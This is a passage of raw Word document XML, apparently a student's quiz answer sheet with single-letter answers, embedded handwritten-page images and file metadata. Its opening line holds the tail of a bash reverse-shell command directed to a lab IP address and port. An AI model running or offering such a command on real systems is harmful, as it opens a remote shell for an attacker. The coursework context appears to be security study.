      <w:r w:rsidR="002B1724" w:rsidRPr="002B1724">
        <w:t>/10.0.2.3/3333 0&lt;&amp;1 2&gt;&amp;1\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC88201" w14:textId="77777777" w:rsidR="00DE322C" w:rsidRDefault="00DE322C" w:rsidP="00DE322C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E83DCB8" w14:textId="63B7523D" w:rsidR="00801F76" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="283B3F19" wp14:editId="2F3CFDF6">
            <wp:extent cx="4521879" cy="6029172"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 9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ece of paper with writing on i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395" cy="60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CE5F" w14:textId="3B934AB9" w:rsidR="00801F76" w:rsidRDefault="00BB4393" w:rsidP="00BB4393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA6695C" w14:textId="15FBC85B" w:rsidR="00BB4393" w:rsidRDefault="00BB4393" w:rsidP="00BB4393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77420533" w14:textId="3ACE73EF" w:rsidR="00BB4393" w:rsidRDefault="00BB4393" w:rsidP="00BB4393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021EB006" w14:textId="77777777" w:rsidR="00BB4393" w:rsidRDefault="00BB4393">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4087AF" w14:textId="15A6C5C7" w:rsidR="00BB4393" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="391CFD72" wp14:editId="57532AFE">
            <wp:extent cx="3850748" cy="6845775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="A picture containing text, paper, menu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paper, menu, docume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8" cy="68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393">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE229C" w14:textId="7D77510D" w:rsidR="00BB4393" w:rsidRDefault="00E72D4A" w:rsidP="00BB4393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656D4AA5" w14:textId="153F3DE2" w:rsidR="00E72D4A" w:rsidRDefault="00E72D4A" w:rsidP="00BB4393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F40D6E" w14:textId="226B9ED3" w:rsidR="00E72D4A" w:rsidRDefault="00E72D4A" w:rsidP="00E72D4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D74C3" w14:textId="3FEF818D" w:rsidR="00580C9C" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A8D68B" wp14:editId="1A54BD51">
            <wp:extent cx="3545439" cy="6303003"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="11" name="Picture 11" descr="A picture containing text, book, paper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book, paper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93" cy="63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CFBE" w14:textId="3E9E68E5" w:rsidR="00E72D4A" w:rsidRDefault="00E72D4A" w:rsidP="00E72D4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2AE2EB" w14:textId="2E504762" w:rsidR="00E72D4A" w:rsidRDefault="00E72D4A" w:rsidP="00E72D4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E7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86F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4AC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4D"/>
    <w:rsid w:val="000E7447"/>
    <w:rsid w:val="0010254C"/>
    <w:rsid w:val="001106DB"/>
    <w:rsid w:val="001448C1"/>
    <w:rsid w:val="00175EE8"/>
    <w:rsid w:val="00177F25"/>
    <w:rsid w:val="001E29FA"/>
    <w:rsid w:val="002550D7"/>
    <w:rsid w:val="0026224D"/>
    <w:rsid w:val="002B1724"/>
    <w:rsid w:val="002B55FA"/>
    <w:rsid w:val="002D407F"/>
    <w:rsid w:val="0035164B"/>
    <w:rsid w:val="003608C7"/>
    <w:rsid w:val="003E1EC8"/>
    <w:rsid w:val="004D3D30"/>
    <w:rsid w:val="00580C9C"/>
    <w:rsid w:val="005839E6"/>
    <w:rsid w:val="005A6F0C"/>
    <w:rsid w:val="005A782A"/>
    <w:rsid w:val="00620AD2"/>
    <w:rsid w:val="00640B7B"/>
    <w:rsid w:val="00652D14"/>
    <w:rsid w:val="006929A0"/>
    <w:rsid w:val="006B0C1D"/>
    <w:rsid w:val="006F7243"/>
    <w:rsid w:val="0078043F"/>
    <w:rsid w:val="00791826"/>
    <w:rsid w:val="007B509C"/>
    <w:rsid w:val="007C13A2"/>
    <w:rsid w:val="007C7206"/>
    <w:rsid w:val="00801F76"/>
    <w:rsid w:val="00925897"/>
    <w:rsid w:val="0093723E"/>
    <w:rsid w:val="00951F20"/>
    <w:rsid w:val="009578C1"/>
    <w:rsid w:val="00997033"/>
    <w:rsid w:val="009B401C"/>
    <w:rsid w:val="009D52A6"/>
    <w:rsid w:val="009E7DE4"/>
    <w:rsid w:val="009F165D"/>
    <w:rsid w:val="00B37F27"/>
    <w:rsid w:val="00B67B2D"/>
    <w:rsid w:val="00BB4393"/>
    <w:rsid w:val="00BB4603"/>
    <w:rsid w:val="00BB4749"/>
    <w:rsid w:val="00BF2FE5"/>
    <w:rsid w:val="00C61C8B"/>
    <w:rsid w:val="00C822A8"/>
    <w:rsid w:val="00CA284D"/>
    <w:rsid w:val="00CA2EAE"/>
    <w:rsid w:val="00CC5CB7"/>
    <w:rsid w:val="00CD7555"/>
    <w:rsid w:val="00D51A13"/>
    <w:rsid w:val="00DC7DF3"/>
    <w:rsid w:val="00DE322C"/>
    <w:rsid w:val="00E72D4A"/>
    <w:rsid w:val="00F17C81"/>
    <w:rsid w:val="00F95502"/>
    <w:rsid w:val="00FE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BCDF6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{662AB78D-8FC7-46CF-B72E-9AEA595C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211</Words>
  <Characters>870</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>58</Lines>
  <Paragraphs>40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Kuppam</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Madan Chinthapally</cp:lastModifiedBy>
  <cp:revision>72</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-04T17:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-02T05:13:00Z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d7ddd7ea-d5db-44dc-98e8-c4f01d25c295</vt:lpwstr>
  </property>
</Properties>
</file>